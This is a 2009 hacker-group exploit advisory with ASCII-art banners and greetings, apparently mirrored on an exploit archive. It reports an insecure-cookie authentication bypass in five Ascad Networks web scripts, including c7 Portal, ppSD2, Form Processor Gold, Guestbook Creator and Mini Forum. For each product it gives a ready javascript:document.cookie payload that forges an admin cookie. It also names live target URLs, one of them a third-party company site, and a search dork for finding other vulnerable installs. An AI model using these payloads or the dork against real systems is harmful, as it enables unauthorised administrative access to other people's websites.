Ascad Networks 5 Products Insecure Cookie Handling Vulnerability

2009-05-14 17:05:35

==============================================================================
_ _ _ _ _ _
/ \ | | | | / \ | | | |
/ _ \ | | | | / _ \ | |_| |
/ ___ \ | |___ | |___ / ___ \ | _ |
IN THE NAME OF /_/ \_\ |_____| |_____| /_/ \_\ |_| |_|


==============================================================================
____ _ _ _ _ ___ _ __
/ ___| | || | | \ | | / _ \ | |/ /
| | _ | || |_ | \| | | | | | | ' /
| |_| | |__ _| | |\ | | |_| | | . \
\____| |_| |_| \_| \___/ |_|\_\...FROM IRAN

==============================================================================

==============================================================================

[»] Script:.............[ Ascad Networks Scripts ]....................
[»] Website:............[ http://www.ascadnetworks.com ]..............
[»] Today:..............[ 1305009 ]...................................
[»] Founder:............[ G4N0K | mail[.]ganok[sh!t]gmail.com ].......



[+] c7 Portal <= v1.1.0
===============================

Live...: http://hatcocorporation.com/c7/

[0] javascript:document.cookie = "c7portal=admin";
[1] now navigate to: http://hatcocorporation.com/c7/home/
esle, you will fall into a loop ;)...

[1] d0rk: intitle:"c7 Portal by Ascad Networks"




[+] Password Protector SD v2 (ppSD2)
===============================

Live...: http://ppsd2008.passwordprotectorsd.com/ppSD2/admin/

[0] javascript:document.cookie = "c7portal=admin";





[+] Form Processor Gold
===============================

Live...: http://www.ascadnetworks.com/cgi-bin/demos/fp_gold/admin.pl

[0] javascript:document.cookie = "FormProGold=in";





[+] Guestbook Creator v1.5
===============================

Live...: http://www.ascadnetworks.com/cgi-bin/demos/gb/admin.pl

[0] javascript:document.cookie = "ascadnetworks_gbook_admin=in";





[+] Mini Forum v1.0.1
===============================

Live...: http://www.ascadnetworks.com/cgi-bin/demos/mf/admin.pl

[0] javascript:document.cookie = "admf=admin";




[+] Greetz
===================================
[»] ALLAH
[»] MSD, AMD, AFN, SMN...
[»] Hussain-X, JiKo, Sakab(!)...

#

Fixes

No fixes

In order to submit a new fix you need to be registered.